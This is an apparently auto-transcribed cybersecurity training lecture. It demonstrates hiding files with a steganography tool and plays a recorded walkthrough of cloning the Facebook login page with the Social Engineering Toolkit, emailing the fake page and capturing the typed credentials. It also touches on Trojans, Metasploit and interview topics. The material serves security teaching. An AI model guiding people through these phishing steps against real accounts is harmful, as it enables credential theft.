important. Secret file. So I'll also use something else as a carrier. Maybe what I'll do, maybe computer or maybe from the DVD, I'll take something. Not this. Some file I'll take. I wanted to see some file, maybe which is having some. Okay, I'll take this jar file, something like this. Okay, which is of 7 MB, not much. Otherwise, I'll take something else also, which is much lesser than that size. This KNNW is also a password hacking tool. Smack. Okay, this one is also there. Okay, I'll remove this one. So this is one file which I'll say I'll rename it as carrier. For your understanding. I'll install this one, stealth files. All defaults. Yes, and finish. Done. So here I'm removing all the unwanted files which I don't require for our easy to understand. Now I have a secret file here. I have a carrier file here. So what I'm going to do, I'll just run this particular file in stealth. Okay, in stealth. So here first I'll try to hide the file. Add the source file. Add the carrier file. This is the secret file which I am going to add. The secret file is, it can be any type of file. I'm not saying it should be a text file only. It can be anything which is there. But here I'm using the text file. Choose the carrier file. Carrier file is again there on the desktop itself. This is one. Choose a password. Choose a password means I'll say and say hide files. Destroy the source file. This file will be vanished. If I say this particular one, this is the source file. It will be vanished once it goes in, sits inside this particular file. You can see that. Hide files. The file is vanished. Okay, the file is vanished. And now safely you can send this program to your friend. It has gone there. Now what your friend will do, he will try to open this file using this, stealth file. In this, with the help of stealth file. Retrieve the file. So what is your carrier file now? Carrier is there on my desktop. Carrier is there on my desktop. Choose the destination directory. What is my destination? It should be on my desktop itself. I want to restore. On my desktop itself, I want to restore. I have given that. What is the passcode? I have given as GitHub. Okay. If you give wrong password, it will not retrieve. So I am giving this password, retrieve files. See, this secret file is now returned back. The secret file is returned back. This is how many people do hacking. Many people send confidential information. In meanwhile, if someone comes to know that this file, you can execute this file also. Okay. Of course, this is not this particular 64-bit, so that's why. But this file is not modified. It keeps the data inside in this one in a separate, stack. In a separate stack, so that everything is isolated. Is this clear? Is this clear? So this is how you can keep text files or even any exe files also into this stealth steganography. Okay, if you practice a little bit, of course, you will understand better. But this is called as steganography. In today's world, we have different type of stegos. I'll tell you different type of stegos we have. Even your voice steganographies are there, motion picture steganography is there. You might be only thinking that you are only streaming a movie, okay? But inside that, again, there can be secret files which are there. Secret files which are there. Sometimes it so happens that once if the file is opened, if you are trying to open, the similar file also will be there in that both files at the same time it gets opened also. So these are all a part of stegos. Of course, there are good amount of, research articles for steganography for how I can really know whether the file is having stego information or not. All these things can only be known by understanding the file types and headers. There are good amount of forensic tools for that. So with that, they'll try to identify. See, if I tell you, if you go and basically catch an intruder, by the time you go to the intruder's desk, he'll half of the things he'll format it, or half of the things, even if it is caught also, he will not be able to produce anything because they will use all such type of techniques. They'll not keep the file as it is. Oh, if you open the file, oh, you can see a beautiful girl dancing, or maybe the same thing, like maybe like Aishwarya Rai photograph or Virat Kohli or something like that. You might think, he's an ordinary, he may be a fan of so and so, so that may be a normal. But there can be hidden data behind it. There can be hidden. How do you identify the hidden data? Hidden data is only with the help of some forensic tools. You have to go. You have to understand what is all the file types which are there. For every file, a JPG file, there will be a specific kind of header. That is how the file recognition happens. For a Word file, there is a specific type of code which is there. So in that way, even if you change the file type also, the header will come to know. The header will come to know that this only a type. So anyone can change the .txt to .doc, .jpg to .txt or something like that and send it. But that is not the correct validation. Validation can be done only with help of headers. Okay. Any questions as of now? So yeah, in today's class we have focused number of elements. Basically, we started with scanning. Yeah, we thought tomorrow's session will be again a very important. I'll be showing you in real time how you can do a vulnerability scanning also. This is very important. Today we have gone through the basics of vulnerability scanning, like we have gone through the CVE and NVD. Please remember those areas. That is very much. I'll be sending you the notes also. And then we also saw about the attacks, and we also saw about virus. We also saw about malware, trojans. The definitions, all those things are very important. And we saw about how to hack using Windows 7, using one of the exploit tool, which is Metasploit, which is again a very dangerous tool. The framework. And then we learned about steganography. So there can be questions coming from steganography also. Yeah, any questions till now? In all these areas. In different networks. If it is an internet, it is same, right? Internet or within network, both of them are same as long as it is communicable. I was showing in 192 because I don't have a public IP. If I own a public IP, I can create a Trojan on public IP. How do port configuration change? Internet also uses the same. It's not intranet or internet. It is TCP UDP for the ports. Okay, whether it is public or private is distinguished only in the network layer. Ports are only for transport layer. Is this clear? Whether the network should be addressed or not, your router will take care. Oh, this is a LAN IP, so it should not go for internet. That only recognized by your, router, not by your system. Similarly, the ports. So, but ports configuration, no, but like ISP router doesn't allow connections with unknown ports. Yeah, if it is configured, that is what which I'm saying since beginning. If your main router, the gateway router is configured to block, that is called as ACL. Even if how you can really defend in a corporate segment. The first defend is they have to do in the corporate. Outsider should not come inside. Even if there are some laptops or desktops vulnerable also, outsiders cannot come in directly. They have to cross the router and come in. If there is a vulnerability in the router, they can come into the corporate network. Is this clear? So the next is, I think, Vamshi, sir, if we send it over network, then any system can be hacked using public IP. If you are owning a public IP, if you are able to create a Trojan using public IP, here I have used a private IP for creating a Trojan. That is the reason why I could do only in my private networks. But if I have a public IP, the real hacker will own a public IP, he will do it. He will do it, and he will get a backdoor in that way. That is all. That is about the public IP. Okay. Is this clear, Vamshi? Yes. We can create our own tool like Metasploit for phishing attacks or any. I'll show you phishing attacks. Tomorrow, next class, I'll be showing you about social engineering, how phishing attacks can be done. Okay. We have a social engineering toolkit. With that, I'll be showing you how you can hack a Facebook account or something like that. Phishing. A URL which is very similar. Without knowing, you might be accessing that and then you might be landing up into trouble. Okay, phishing attacks. I think I have created a small video on that for phishing. You can go through that particular video also about where is that. What I can say is Facebook. I mean, how you can hack your Facebook. Where are my videos? You can say Facebook. This is social engineering, which is there. If you want, you can go through this one about 10 minutes. I have given the complete literature of how you can hack. So phishing, shoulder surfing. Shoulder surfing is another attack. So here also I have given good amount of terminology. You can go through this one, which will be very, very helpful. Mainly the different kind of attacks in social engineering. So here this phishing will come into the picture. This phishing attack. People. So here you can see the lab also after the theory, which is there after the theory, which is very, very essential. Please watch. So hacker normally uses this social engineering tool. You can go through. I'm just showing you this one. Here first I will be launching this social engineering tools, and here I go to this social engineering tool. So this has like there are many options which are there. Selecting social engineering attacks. How generally the hacker does this Facebook or any other URL, hacking. So here I am selecting this website attack vectors, and I will be selecting this credential harvester attack vector. This I will be doing this site cloner. I can do this site cloner. So IP address is the address of a hacker's IP address, which will be embedded. This is my IP address 192.168.128. I am selecting the default. So now, what is the URL which you want to clone the website? So for that, what I will do, I will go to a website. I will try whether Facebook is working or not. So I click this one. So it is, you can see this is the website I want to clone now. So remember, this is what hacker does. I'm copying the URL. I'm just copying the URL and I'm pasting it here. Okay. So this website, the first phase will be cloned. So now here this is done. So now what I'm going to do, I press return to understand what we are saying. Now this is done. So what the hacker does, he has the code ready. So he will be sending email. So for this is the hacker's ID. So I'll say that a new message I'll be sending to one of my friend, maybe to my other account. This is purely for demonstration. So here this is my mail ID. I say Facebook account. Okay. So I will attach the code. I will browse this computer. This is what is the HTML code which contains. So I am attaching. So it is 86 bytes. I send this one to the destination, I mean recipient, to the recipient. Now this mail has been sent. Okay. Okay, I'm into another system now. Here what the hacker does. So the victim, from the victim side, he will check his inbox. Yes, he has a mail right. Being a friend of me, or it looks like they'll click this particular one. Facebook account. Okay, there is a code here, there is an attachment, hello.html. But believe me, this is the original Facebook account. You see this one? This is my Facebook account. Okay, so what you can do, hacker has sent some link. So here I can say view this particular one. Click here to open Facebook website. But this is a fake one. Again, I'm saying. So here you see it came out in a different language, but it's okay. So without knowing what we give our username, I'm not giving the real password, some other password I'll try to give. For your information, I'm saying even hacker report. This is the period. I'll say login, and now you see it goes to the real site. It goes to the real site. So it has been logged in successfully. We really don't understand the behind thing, but this is there inside the code. So now what has happened? Again, I switch back to Kali Linux. You see here, there is some dump which has come. There is one dump which has come. If you carefully go through, you will see the email ID and also the password which has come across. You see here, this is the feed, username feed, and this is the password. So this is the way where they really gain and access this particular Facebook or even a Twitter account or any other. It can be banking websites also. So in this way, hacker gains. He monitors each and everything. So you see this one, how dangerous this is. He gets the complete information. He may not change, but he'll try to make use, preserve it. As long as he'll make use of your mail ID and he will be sending fake message history of friends. So sometimes it so happens that the same password will be applicable for your mail ID, or it can be even to any other applications which you use. So be careful. So the only way to protect is or change passwords too frequently once in 15 days and don't use public systems where like a browsing and clear the cookies instantaneously. This is the only way where you can reduce the attacks. And don't speak or don't give passwords to any unwanted people other than yourself. So that's all is my presentation. I hope this will be helpful for you to protect your personal or mail accounts or applications. Okay, thank you. So you can, yeah. My name is Anand. So I think you can watch this particular one videos, and many other videos also are available. If you are interested, yes, you can go through and subscribe these channels also, which will be beneficial for you. And I'll be posting more and more videos related to attacks and all these things. And of course, more or less the class elements also I'm posting over there. Yeah, any questions? Yeah, any questions? Who said that hacking videos are not supposed to be? Hacking can be done, but hacking videos are not supposed to be. See, the very reason, then you are not supposed to even learn also hacking. That was the day before 2001 or 2002. Okay. So today, if you want to become a policeman, you have to go for police training. What they teach in police? They teach about the activities of the terrorists, how they do, all this kind of training is necessary. If you are not known, if the awareness is not known for the public that this is going to happen, then how will the users come to know? Users should know that these are the activities which are there. I'm not doing any hacking on a public environment. I'm doing hacking on a private and a local area network environment, and I'm showing that this is the cause. If you can think about it, you will be careful. That is our intention. Our intention is to protect the IT infrastructure. Nowhere it is written that you are not supposed to learn hacking videos or hacking sites or anything. There are hell a lot of videos which are there, hell a lot of articles which are there. And hackers also learn from this one only. But the intention is that whatever hackers knows, you should also know. so that you will be careful in the company so that you can prevent hacker. Is this clear, Tanmay? Okay, I will see that whether I can upload all these things about steganography applications. I'll see that, but it is available. I think snow means snow, which will be there. I'll see that how I can do, because I need to. It will take some more time, not immediately or half an hour or 1 hour. I should be able to do that. Okay. Yeah. Any questions? Any other questions? Any other? Tanmay, don't worry about the policies. Policies means until unless if you are benefited by doing some mischief, then only you are caught. If you are doing some mischief with your friends, then you will be basically doing something wrong. If you are doing some mischief for the organization, then you are wrong. If you are trying to teach to some people in this way, you have to be careful. That is not wrong. Is this clear, Tanmay? Okay. If a Trojan is in our phone, how we can identify? Same thing. What you can do? Manoj is asking how you can. Normally, 99% of the people doesn't use any antivirus vulnerabilities or anti-Trojan vulnerability, security vulnerability. You have to secure your phone. 99% of the people doesn't know that there are security tools for your Android phones. They don't use at all. They use everything day to day. Tomorrow I'll show you. Tomorrow, next, Monday's class, I'll be showing you, Monday or whatever it is, I'll be showing you how you can hack even a mobile phone. So if you want to make it secure, use the tools. Use the tools, secure tools, so that the Trojans are eliminated. It will be tracked across. Or only download the apps from trusted resources, from trusted, like Google Apps or something like that. Don't download any, kind of APKs from any other untrusted resources. If you do that, there are some people who root the phones. Routing is done for the phones so that they can have more access to the phone, or even from untrusted resources also, they can even download the what we call as APKs or whatever that the applications, and then they want to benefit. If you do such type of thing, you keep your mobile separate. Don't keep your sensitive data like your what we call as the contact list. It is a very sensitive contact list, or your SMS messages. What all you can hack? Many things you can hack. Many things. I'll show you. There is a video for that also in YouTube. If you want, if you are in a hurry, you can see that. I have kept it over there. Okay. So yes, you can first hand see that how your phone can be hacked also. So if you know the logic, anything you can do, but a little bit of effort is needed, little bit of confidence. It's not like just like that. I type it, you got it. You have to do. You have to face some difficulties also. You can fail. You can hack even your operating system. You can hack using codes also, PHP codes. I'll show you even if there is a vulnerability in your SQL also, how to hack your system. It's not that always exe code only will hack you for the Windows machine, nothing like that. If there is a vulnerability inside the Java also, you can hack the system. So if there is a vulnerability in your C programming also, you can hack the system. I'll show you buffer overflow attack, something like that. So there are many type of vulnerabilities which you have seen across in CVE, that is common vulnerabilities and exposures. Yes, any questions? So again, I tell you one more important thing. Yeah, you have to even focus the questions, basically cyber security interview questions. Please focus along with this. I have already circulated to you yesterday itself. You can see this one, some of the things which you have studied in your college also. I hope someone can say about cryptography is done. Yes or no? Cryptography.
Yes, sir, it's going on.
Okay, so please, at least you should get good number of questions from cryptography. They may ask symmetric, asymmetric, the differences, and some of the algorithms basically, like maybe either Diffie-Hellman, RSA, DSA, or LBT curve, or whatever it is. So all these are asymmetric, and how this functions basically, outline at least when they ask you. So this is very, very important. What is meant by cyber security, self-explanatory, but you should have a good way of reciprocation of the questions which is there. What is encryption and important? Because encryption plus your data is what we call as cipher. Okay, sorry, encryption is equal to your data plus cipher equal to encryption. And decryption is nothing but your what is this encrypted data minus of cipher. The ciphers are nothing but the algorithms. You can see this particular. This is CIA, which I spoke on the very first day, like confidentiality. Why we need to have a security? This is called as a CIA triad. Please understand this one. To protect. What is the role of a cyber security? To protect the confidentiality of the organization. Organizational infrastructure or infrastructure include all the activities. It can be user IDs, or it can be passwords, or it can be even the infrastructure like your data, or it can be protection of your applications, or it can be even the messages also from your for your boss or for your coordinate colleagues or anything. Confidentiality means the element, the data should only go to the right person only, not for all. Integrity is the trustworthiness. Trustworthiness, how trust you are, how should I believe you, why should I believe you? This is all integrity. Integrity. When you are in an organization, you have to be loyal and faithful. This is called as integrity. If you are given some signature power, that means you cannot misuse. You cannot write checks just like that. Okay. Or if you are given a servers, means you cannot misuse like that. There are many assets which will be given as part of role and as part of the role inside the organization. But you should be loyal enough. If you want to leave the organization, whether it's good or bad, but your integrity should not be lost. Your trust should not be lost. You cannot tell the organizational secrets to your competitor. That is all integrity. And availability. You should ensure that whatever the support things which are there are always available to the clients or to your users or whatever. This is more important. Please read this one. CIA is a what we call is a bold one, which I want to tell you. Risk, vulnerability, and threat we discussed today. How do you report a risk? So it's self-explanatory. We'll also have a session on IDS and IPS. We will work on that. Weak information security. How to set up a firewall. We spoke about that. Firewall is already there inside the system, which is called as host-based firewall. In corporates, we have routers, and those are called network-based firewall. So this one also, please understand SSL encryption for all your where we use is HTTPS based website. Any HTTPS based website, you see this as SSL stands for secure socket layer, which is 443. I mean port where it encrypts. It has an encryption algorithm of all the data which is going across from the website. I mean from your website is encrypted and sent it to the remote location. Okay. So that is about this. SSL and TLS. Please go through this. All this is secure socket layer and transport layer service. So these are again important. I'll speak about hashing, salting and hashing, all these things. Okay. Yeah. Any other questions? Please go through at least day to day. Do we have class tomorrow? Yes, I think I have already sent the invite. We have a class tomorrow. Tomorrow is Saturday. We have. Any questions? Because we have a stipulated time. So, but Sunday there is no class. Sunday we don't have a class. Okay. So please follow until unless if I receive any information from your college, then only there will be a change. Otherwise, all the 10 days we have classes. Okay. If there is any change also, will be notified to you either through through email or through WhatsApp, whatever it is that. Okay. So we have all these things. Please go through this one also parallelly. Already, network say questions also has been circulated. Here also the questions are there. Still more questions I have, but first to finish off this one. There are about 30 or 40 questions here. Okay. What people say that after the interviews also, more or less what we are discussing, the topics related to the technicalities other than your coding, they are getting these particular questions only. But some people expressed the sympathy of, yes, sir, we should have done a little bit more homework, sir. Otherwise, we would have qualified. Otherwise, we would have, that retention also was there last year. I saw that people coming and crying before me. Sir, I should have really practiced, sir. Only 2 days. You said that you should these things you should learn, but unfortunately I didn't do that. I missed out. It is coming to my mouth, but I am unable to do that. So in that way, I lost. So things happen in that particular way also. Just to go ahead. So once the winning is based basically on a couple of factors. Is only your hard work. Okay. Any other questions? The only question which I wanted to ask is that how much you are practicing on all these things. I will try to share all the information, whatever are the things which are there, and also the tools as asked by Debijit. I'll see that if I can share the tools. Normally, exe files cannot be shared in Google Drive, but let me see that how I can keep it in zip file or something like that. But it will take some more time. Some more time. I'll keep a separate folder and then I'll keep all the tools, just like I kept for Cisco packet tracer. I'll see all the essential tools can be kept over there. You can download in a single go. Okay. I will tell this one. This is tomorrow's agenda. Tomorrow's agenda. This is through the vulnerability scanner. We have a vulnerability scanner. I'll show you Acunetics. With that, whether it is Java or PHP or C programming or anything, any damn program which is there, you can basically figure out SQL, anything like your backend or front end or operating system or technicalities, anything. What type of attacks also are can be potentially happen will also be known with help of the vulnerability scanners. Is this clear? Normally during our course, I'll also show about this Java exploit, but now I cannot show all the exploits coming across. Okay, so Java exploit also I used to show, like which I was showing for exe attack, which on Windows 7. So that's all from me for today. Just go through all the things which we have discussed and also go through the cyber security questions. Okay, thank you from me. If there are no questions, and we'll meet again tomorrow.